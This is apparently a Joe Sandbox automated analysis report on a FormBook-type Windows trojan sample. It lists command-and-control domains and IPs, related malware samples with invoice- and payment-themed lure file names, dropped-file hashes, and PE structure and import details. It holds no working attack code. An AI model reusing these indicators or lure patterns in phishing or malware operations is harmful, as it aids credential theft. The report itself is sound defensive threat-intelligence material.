http://www.1secondlending.one/6pwo/ | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://ac.ecosia.org/autocomplete?q= | powercfg.exe, 00000005.00000002.2616496531.0000000007D3B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/chrome_newtab | powercfg.exe, 00000005.00000002.2616496531.0000000007D3B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | powercfg.exe, 00000005.00000002.2616496531.0000000007D3B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://joker.com/?pk_campaign=Parking&pk_kwd=text | powercfg.exe, 00000005.00000002.2614313409.000000000417A000.00000004.10000000.00040000.00000000.sdmp, powercfg.exe, 00000005.00000002.2616328430.00000000062F0000.00000004.00000800.00020000.00000000.sdmp, ycBMGRFRlht.exe, 00000008.00000002.2613874662.0000000003ABA000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://kb.fastpanel.direct/troubleshoot/ | powercfg.exe, 00000005.00000002.2616328430.00000000062F0000.00000004.00000800.00020000.00000000.sdmp, powercfg.exe, 00000005.00000002.2614313409.0000000003FE8000.00000004.10000000.00040000.00000000.sdmp, ycBMGRFRlht.exe, 00000008.00000002.2613874662.0000000003928000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | powercfg.exe, 00000005.00000002.2616496531.0000000007D3B000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.oneeyetrousersnake.xyz | ycBMGRFRlht.exe, 00000008.00000002.2615837301.000000000570B000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | powercfg.exe, 00000005.00000002.2616496531.0000000007D3B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | powercfg.exe, 00000005.00000002.2616496531.0000000007D3B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | powercfg.exe, 00000005.00000002.2616496531.0000000007D3B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | powercfg.exe, 00000005.00000002.2616496531.0000000007D3B000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
38.47.233.21 | qqa79.top | United States | 174 | COGENT-174US | false
188.114.97.3 | www.supernutra01.online | European Union | 13335 | CLOUDFLARENETUS | false
43.205.198.29 | www.1secondlending.one | Japan | 4249 | LILLY-ASUS | false
194.245.148.189 | www.wine-drinkers.club | Germany | 5517 | CSLDE | true
63.250.43.134 | oneeyetrousersnake.xyz | United States | 22612 | NAMECHEAP-NETUS | true
                                                  Joe Sandbox version:42.0.0 Malachite
                                                  Analysis ID:1587987
                                                  Start date and time:2025-01-10 20:08:50 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 8m 42s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:10
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:2
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:wWXR5js3k2.exe
                                                  renamed because original name is a hash value
                                                  Original Sample Name:919e47baabe9cc5fe28aa098991efc624b4cfe2c4008ce036a35b49edc438a4d.exe
                                                  Detection:MAL
                                                  Classification:mal100.troj.spyw.evad.winEXE@7/5@6/5
                                                  EGA Information:
                                                  • Successful, ratio: 75%
                                                  HCA Information:
                                                  • Successful, ratio: 97%
                                                  • Number of executed functions: 58
                                                  • Number of non-executed functions: 284
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe
                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                  • Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.109.210.53, 20.242.39.171, 4.175.87.197
                                                  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, fe3cr.delivery.mp.microsoft.com
                                                  • Execution Graph export aborted for target ycBMGRFRlht.exe, PID 3688 because it is empty
• Not all processes were analyzed; report is missing behavior information
                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
14:11:12 | API Interceptor | 451302x Sleep call for process: powercfg.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
38.47.233.21 | Recibos.exe | malicious | FormBook | www.qqa79.top/dp98/
38.47.233.21 | CV_ Filipa Barbosa.exe | malicious | FormBook | www.qqa79.top/dp98/
188.114.97.3 | NWPZbNcRxL.exe | malicious | FormBook | www.vh5g.sbs/rjsl/
188.114.97.3 | KSts9xW7qy.exe | malicious | FormBook | www.beylikduzu616161.xyz/2nga/?xP7x=Q2EbwnYhq4vEVEYxQpNjsu4gFlGHCs4lBliPtc8X0AIyDwowOCFGn/661E09vvaaF3LvgpjgW8Wvr6GWd63ULodNNE679jqiZ5mYQ2jjCrjO82Z0/3agI7E=&F4=Q0yHy
188.114.97.3 | GTA5-elamigos.exe | malicious | Esquele Stealer | /api/get/dll
188.114.97.3 | DHL DOCS 2-0106-25.exe | malicious | FormBook | www.uzshou.world/ricr/
188.114.97.3 | Order Inquiry.exe | malicious | FormBook | www.cifasnc.info/8rr3/
188.114.97.3 | Gg6wivFINd.exe | malicious | DCRat, PureLog Stealer, zgRAT | unasnetds.ru/eternalPython_RequestUpdateprocessAuthSqlTrafficTemporary.php
188.114.97.3 | Payment Receipt.exe | malicious | FormBook | www.cifasnc.info/8rr3/
188.114.97.3 | dGhlYXB0Z3JvdXA=-free.exe | malicious | Unknown | /api/get/free
188.114.97.3 | dGhlYXB0Z3JvdXA=-free.exe | malicious | Unknown | /api/get/free
188.114.97.3 | RFQ 3100185 MAHAD.exe | malicious | FormBook | www.rgenerousrs.store/o362/
43.205.198.29 | Document_084462.scr.exe | malicious | FormBook, GuLoader | www.1secondlending.one/j8pv/?ChhG6=J-xs&2O=JIuj9wxSnK6mEyWE+aiov6ee/jFUGAOavn5HAjA8ht24L6v+vQ9uqWj6ig59Dwg+VmGSo2u3Iy71OFL1070b+iEHSPgDI61AbnX1cIuegQgrBk3SzXJVVb4=
43.205.198.29 | Proforma invoice - Arancia NZ.exe | malicious | FormBook | www.1secondlending.one/j8pv/
43.205.198.29 | PAYMENT_ADVICE.exe | malicious | FormBook | www.1secondlending.one/6pwo/
43.205.198.29 | PAYROLL LIST.exe | malicious | FormBook | www.1secondlending.one/j8pv/
43.205.198.29 | Project Breakdown Doc.exe | malicious | FormBook | www.1secondlending.one/6pwo/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.wine-drinkers.club | PAYMENT_ADVICE.exe | malicious | FormBook | 194.245.148.189
www.wine-drinkers.club | Project Breakdown Doc.exe | malicious | FormBook | 194.245.148.189
www.supernutra01.online | u549ed5dEA.exe | malicious | FormBook | 188.114.96.3
www.supernutra01.online | ORDER - 401.exe | malicious | FormBook | 172.67.220.36
www.supernutra01.online | 01152-11-12-24.exe | malicious | FormBook | 104.21.24.198
www.supernutra01.online | DRAFT COPY BL, CI & PL.exe | malicious | FormBook | 172.67.220.36
www.supernutra01.online | PO_1111101161.vbs | malicious | FormBook | 104.21.24.198
www.supernutra01.online | PAYMENT_ADVICE.exe | malicious | FormBook | 104.21.24.198
www.supernutra01.online | Payment-251124.exe | malicious | FormBook | 104.21.24.198
www.supernutra01.online | DO-COSU6387686280.pdf.exe | malicious | FormBook, PureLog Stealer | 104.21.24.198
www.supernutra01.online | CV Lic H&S Olivetti Renzo.exe | malicious | FormBook | 172.67.220.36
www.supernutra01.online | CV Lic H&S Olivetti Renzo.exe | malicious | FormBook | 172.67.220.36
www.1secondlending.one | Recibos.exe | malicious | FormBook | 43.205.198.29
www.1secondlending.one | Document_084462.scr.exe | malicious | FormBook, GuLoader | 43.205.198.29
www.1secondlending.one | Proforma invoice - Arancia NZ.exe | malicious | FormBook | 43.205.198.29
www.1secondlending.one | PAYMENT_ADVICE.exe | malicious | FormBook | 43.205.198.29
www.1secondlending.one | CV_ Filipa Barbosa.exe | malicious | FormBook | 43.205.198.29
www.1secondlending.one | PAYROLL LIST.exe | malicious | FormBook | 43.205.198.29
www.1secondlending.one | CV_ Filipa Barbosa.exe | malicious | FormBook | 43.205.198.29
www.1secondlending.one | Project Breakdown Doc.exe | malicious | FormBook | 43.205.198.29
www.1secondlending.one | CV_ Filipa Barbosa.exe | malicious | FormBook | 43.205.198.29
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | psibx9rXra.exe | malicious | FormBook | 23.227.38.74
CLOUDFLARENETUS | ppISxhDcpF.exe | malicious | GuLoader, MassLogger RAT | 104.21.96.1
CLOUDFLARENETUS | invoice_AG60538.pdf | malicious | Unknown | 172.64.41.3
CLOUDFLARENETUS | CvzLvta2bG.exe | malicious | MassLogger RAT, PureLog Stealer | 104.21.32.1
CLOUDFLARENETUS | bkTW1FbgHN.exe | malicious | FormBook | 104.21.7.187
CLOUDFLARENETUS | m0CZ8H4jfl.exe | malicious | GuLoader, MassLogger RAT | 104.21.96.1
CLOUDFLARENETUS | Message 2.eml | malicious | Unknown | 172.64.41.3
CLOUDFLARENETUS | FPACcnxAUT.exe | malicious | MassLogger RAT | 104.21.96.1
CLOUDFLARENETUS | jxy62Zm6c4.exe | malicious | MassLogger RAT | 104.21.96.1
CLOUDFLARENETUS | frosty.arm.elf | malicious | Mirai | 104.23.145.230
CSLDE | OVZizpEU7Q.exe | malicious | FormBook | 194.245.148.189
CSLDE | KSts9xW7qy.exe | malicious | FormBook | 194.245.148.189
CSLDE | miori.arm.elf | malicious | Unknown | 194.245.229.87
CSLDE | sh4.elf | malicious | Mirai | 194.245.229.64
CSLDE | Fantazy.arm7.elf | malicious | Mirai | 194.245.230.66
CSLDE | nabmips.elf | malicious | Unknown | 159.25.86.139
CSLDE | nshkmpsl.elf | malicious | Mirai | 194.245.230.82
CSLDE | z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe | malicious | FormBook | 194.245.148.189
CSLDE | x86_32.nn.elf | malicious | Mirai, Okiru | 194.245.186.15
CSLDE | PAYMENT_ADVICE.exe | malicious | FormBook | 194.245.148.189
LILLY-ASUS | frosty.arm.elf | malicious | Mirai | 43.62.215.242
LILLY-ASUS | frosty.spc.elf | malicious | Mirai | 40.222.102.237
LILLY-ASUS | frosty.x86.elf | malicious | Mirai | 42.64.174.137
LILLY-ASUS | frosty.sh4.elf | malicious | Mirai | 40.58.230.116
LILLY-ASUS | secured File__esperion.com.html | malicious | Phisher | 43.153.232.152
LILLY-ASUS | secured File__esperion.com.html | malicious | Phisher | 43.152.64.207
LILLY-ASUS | sora.arm.elf | malicious | Mirai | 40.28.234.65
LILLY-ASUS | 3.elf | malicious | Unknown | 40.6.208.55
LILLY-ASUS | 5.elf | malicious | Unknown | 43.126.67.223
LILLY-ASUS | 5.elf | malicious | Unknown | 43.15.214.40
COGENT-174US | psibx9rXra.exe | malicious | FormBook | 154.23.178.183
COGENT-174US | OVZizpEU7Q.exe | malicious | FormBook | 38.181.21.178
COGENT-174US | pKXxiawkTj.exe | malicious | XWorm | 154.39.0.150
COGENT-174US | frosty.arm.elf | malicious | Mirai | 154.62.137.46
COGENT-174US | frosty.spc.elf | malicious | Mirai | 38.148.77.12
COGENT-174US | frosty.sh4.elf | malicious | Mirai | 23.154.10.225
COGENT-174US | cNDddMAF5u.exe | malicious | FormBook | 154.23.178.231
COGENT-174US | zE1VxVoZ3W.exe | malicious | FormBook | 38.181.21.54
COGENT-174US | https://sign-as.allarknow.online/ | malicious | Unknown | 50.7.127.10
COGENT-174US | http://pdfdrive.com.co | malicious | Unknown | 143.244.56.53
                                                  No context
                                                  Process:C:\Windows\SysWOW64\powercfg.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                  Category:dropped
                                                  Size (bytes):196608
                                                  Entropy (8bit):1.1221538113908904
                                                  Encrypted:false
                                                  SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
                                                  MD5:C1AE02DC8BFF5DD65491BF71C0B740A7
                                                  SHA1:6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
                                                  SHA-256:CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
                                                  SHA-512:01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Process:C:\Users\user\Desktop\wWXR5js3k2.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):10806
                                                  Entropy (8bit):7.4826163425545404
                                                  Encrypted:false
                                                  SSDEEP:192:J1Eu3FqgxVh4QgU0nIWW7j6QWLqngZsIsv26W26KXbkEB/:JjVh4QgU4Id7jRWGncZsvs2TXbkEF
                                                  MD5:5D201F82EFD947F911484C1BB5B1DE5C
                                                  SHA1:EEE9C3182A82B81E0496B7DA3DCAE5472B091B7D
                                                  SHA-256:64253D19E548B8A144BC1ACFAE1D2445D214327CAA9A386072C1B8899EEE6C37
                                                  SHA-512:1F8260F476233DE54E69F277130D20FBDC4F2FF4788C8DC84D19FCE2ABB49FF69FBE2E17013E87B612F7779CAF0D1663A310616EF88C1BCB93B73C1663139958
                                                  Malicious:false
                                                  Reputation:low
                                                  Process:C:\Users\user\Desktop\wWXR5js3k2.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):289792
                                                  Entropy (8bit):7.992456378879009
                                                  Encrypted:true
                                                  SSDEEP:6144:QKzTttzrvDbtOz3TBq5NdJsIcacOWcwS7CcoZe2a:QqrbCZJnShoNa
                                                  MD5:E344F9FEFD8E172F3EDA2D79A5051804
                                                  SHA1:EDFCC265011CECFF50609485CE46052CD48D62E8
                                                  SHA-256:FA59FA82194B3FE06FF6D8085782EB3150BCD64B76B7F365EA3DC4D2B2BEB940
                                                  SHA-512:C3D5750B1E16B82FDED759B94DA9D4E103DCC8E792B0078AC8B1CB82BE246CBFA94F53B01D2D78DC68373EED74BBCE1AE254D7C1C177D2C4FEAB424C29561B40
                                                  Malicious:false
                                                  Process:C:\Users\user\Desktop\wWXR5js3k2.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):289792
                                                  Entropy (8bit):7.992456378879009
                                                  Encrypted:true
                                                  SSDEEP:6144:QKzTttzrvDbtOz3TBq5NdJsIcacOWcwS7CcoZe2a:QqrbCZJnShoNa
                                                  MD5:E344F9FEFD8E172F3EDA2D79A5051804
                                                  SHA1:EDFCC265011CECFF50609485CE46052CD48D62E8
                                                  SHA-256:FA59FA82194B3FE06FF6D8085782EB3150BCD64B76B7F365EA3DC4D2B2BEB940
                                                  SHA-512:C3D5750B1E16B82FDED759B94DA9D4E103DCC8E792B0078AC8B1CB82BE246CBFA94F53B01D2D78DC68373EED74BBCE1AE254D7C1C177D2C4FEAB424C29561B40
                                                  Malicious:false
                                                  Process:C:\Users\user\Desktop\wWXR5js3k2.exe
                                                  File Type:ASCII text, with very long lines (28674), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):28674
                                                  Entropy (8bit):3.5735499298872506
                                                  Encrypted:false
                                                  SSDEEP:768:Mu8vDyvojb1UiS6XdHr4iHiTogmPNoFma:wDoojb1UP6Zr4iHiToRSma
                                                  MD5:229FB6BC57A6D0E975A39A18AAFFD395
                                                  SHA1:D440F95F4C38F5EFC0A33F4051BA5E957C3490AF
                                                  SHA-256:7D28F04A0A659D688A31DC1772DD9887F84DCC2C2B05FE4558F18072363CDFF0
                                                  SHA-512:66CDD8EED4654C17445BF1F9F216D2D9AFDA2E2368DA388DCB72C981245EC895825C0134A0A3B0DC9DD654B20FFB2DC7269F4FE21B5EE847B8533D7988FA245A
                                                  Malicious:false
                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Entropy (8bit):7.116731243694267
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:wWXR5js3k2.exe
                                                  File size:1'326'080 bytes
                                                  MD5:9d8150f9b27a2a93925717d361add951
                                                  SHA1:92f4860eda8a22e43fc777b64c590891280d6a80
                                                  SHA256:919e47baabe9cc5fe28aa098991efc624b4cfe2c4008ce036a35b49edc438a4d
                                                  SHA512:f42b18b50e89001466a1ddf3a88b35b5139ba1d1f0988e208a25629df3733caf80e38d749b783ce297a434b6a1365bfd6d958254649c6573db78e1932f57b799
                                                  SSDEEP:24576:7u6J33O0c+JY5UZ+XC0kGso6FaOFfrcHNZs9rBNwBV9m1JHeWY:1u0c++OCvkGs9FaOVcM9r4A/Y
                                                  TLSH:8255BF12A3DD8360CA665633BF2A77016E7B7C256D34F85B1F843C79AB731A1122C663
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                                  Icon Hash:0d61030111110104
                                                  Entrypoint:0x427dcd
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x675F772D [Mon Dec 16 00:41:17 2024 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:5
                                                  OS Version Minor:1
                                                  File Version Major:5
                                                  File Version Minor:1
                                                  Subsystem Version Major:5
                                                  Subsystem Version Minor:1
                                                  Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                  Instruction
                                                  call 00007FD7C5130C9Ah
                                                  jmp 00007FD7C5123A64h
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  push edi
                                                  push esi
                                                  mov esi, dword ptr [esp+10h]
                                                  mov ecx, dword ptr [esp+14h]
                                                  mov edi, dword ptr [esp+0Ch]
                                                  mov eax, ecx
                                                  mov edx, ecx
                                                  add eax, esi
                                                  cmp edi, esi
                                                  jbe 00007FD7C5123BEAh
                                                  cmp edi, eax
                                                  jc 00007FD7C5123F4Eh
                                                  bt dword ptr [004C31FCh], 01h
                                                  jnc 00007FD7C5123BE9h
                                                  rep movsb
                                                  jmp 00007FD7C5123EFCh
                                                  cmp ecx, 00000080h
                                                  jc 00007FD7C5123DB4h
                                                  mov eax, edi
                                                  xor eax, esi
                                                  test eax, 0000000Fh
                                                  jne 00007FD7C5123BF0h
                                                  bt dword ptr [004BE324h], 01h
                                                  jc 00007FD7C51240C0h
                                                  bt dword ptr [004C31FCh], 00000000h
                                                  jnc 00007FD7C5123D8Dh
                                                  test edi, 00000003h
                                                  jne 00007FD7C5123D9Eh
                                                  test esi, 00000003h
                                                  jne 00007FD7C5123D7Dh
                                                  bt edi, 02h
                                                  jnc 00007FD7C5123BEFh
                                                  mov eax, dword ptr [esi]
                                                  sub ecx, 04h
                                                  lea esi, dword ptr [esi+04h]
                                                  mov dword ptr [edi], eax
                                                  lea edi, dword ptr [edi+04h]
                                                  bt edi, 03h
                                                  jnc 00007FD7C5123BF3h
                                                  movq xmm1, qword ptr [esi]
                                                  sub ecx, 08h
                                                  lea esi, dword ptr [esi+08h]
                                                  movq qword ptr [edi], xmm1
                                                  lea edi, dword ptr [edi+08h]
                                                  test esi, 00000007h
                                                  je 00007FD7C5123C45h
                                                  bt esi, 03h
                                                  jnc 00007FD7C5123C98h
                                                  Programming Language:
                                                  • [ASM] VS2013 build 21005
                                                  • [ C ] VS2013 build 21005
                                                  • [C++] VS2013 build 21005
                                                  • [ C ] VS2008 SP1 build 30729
                                                  • [IMP] VS2008 SP1 build 30729
                                                  • [ASM] VS2013 UPD4 build 31101
                                                  • [RES] VS2013 build 21005
                                                  • [LNK] VS2013 UPD4 build 31101
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xba44c | 0x17c | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x7b24c | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x143000 | 0x711c | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4870 | 0x40 | .rdata |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x8dcc4 | 0x8de00 | d28a820a1d9ff26cda02d12b888ba4b4 | False | 0.5728679102422908 | data | 6.676118058520316 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x8f000 | 0x2e10e | 0x2e200 | 79b14b254506b0dbc8cd0ad67fb70ad9 | False | 0.33535526761517614 | OpenPGP Public Key | 5.76010872795207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0xbe000 | 0x8f74 | 0x5200 | 9f9d6f746f1a415a63de45f8b7983d33 | False | 0.1017530487804878 | data | 1.198745897703538 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0xc7000 | 0x7b24c | 0x7b400 | f5fe3e684448d35891964b7216a5ebc9 | False | 0.8383323561105477 | data | 7.4335009524873605 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x143000 | 0x711c | 0x7200 | 6fcae3cbbf6bfbabf5ec5bbe7cf612c3 | False | 0.7650767543859649 | data | 6.779031650454199 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0xc7548 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216 |
| RT_ICON | 0xc7670 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027 |
| RT_ICON | 0xc7798 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135 |
| RT_ICON | 0xc78c0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 5905 x 5905 px/m | English | Great Britain | 0.4397163120567376 |
| RT_ICON | 0xc7d28 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 5905 x 5905 px/m | English | Great Britain | 0.3449812382739212 |
| RT_ICON | 0xc8dd0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 5905 x 5905 px/m | English | Great Britain | 0.3120331950207469 |
| RT_ICON | 0xcb378 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 5905 x 5905 px/m | English | Great Britain | 0.2896197449220595 |
| RT_ICON | 0xcf5a0 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 5905 x 5905 px/m | English | Great Britain | 0.24670235419377737 |
| RT_ICON | 0xdfdc8 | 0xe41e | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.000188362615158 |
| RT_MENU | 0xee1e8 | 0x50 | data | English | Great Britain | 0.9 |
| RT_STRING | 0xee238 | 0x594 | data | English | Great Britain | 0.3333333333333333 |
| RT_STRING | 0xee7cc | 0x68a | data | English | Great Britain | 0.2747909199522103 |
| RT_STRING | 0xeee58 | 0x490 | data | English | Great Britain | 0.3715753424657534 |
| RT_STRING | 0xef2e8 | 0x5fc | data | English | Great Britain | 0.3087467362924282 |
| RT_STRING | 0xef8e4 | 0x65c | data | English | Great Britain | 0.34336609336609336 |
| RT_STRING | 0xeff40 | 0x466 | data | English | Great Britain | 0.3605683836589698 |
| RT_STRING | 0xf03a8 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186 |
| RT_RCDATA | 0xf0500 | 0x517e6 | data | | | 1.0003325364441968 |
| RT_GROUP_ICON | 0x141ce8 | 0x5a | data | English | Great Britain | 0.7888888888888889 |
| RT_GROUP_ICON | 0x141d44 | 0x14 | data | English | Great Britain | 1.25 |
| RT_GROUP_ICON | 0x141d58 | 0x14 | data | English | Great Britain | 1.15 |
| RT_GROUP_ICON | 0x141d6c | 0x14 | data | English | Great Britain | 1.25 |
| RT_VERSION | 0x141d80 | 0xdc | data | English | Great Britain | 0.6181818181818182 |
| RT_MANIFEST | 0x141e5c | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823 |
| DLL | Import |
|---|---|
| WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect |
| VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW |
| WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW |
| COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create |
| MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W |
| WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW |
| PSAPI.DLL | GetProcessMemoryInfo |
| IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho |
| USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW |
| UxTheme.dll | IsThemeActive |
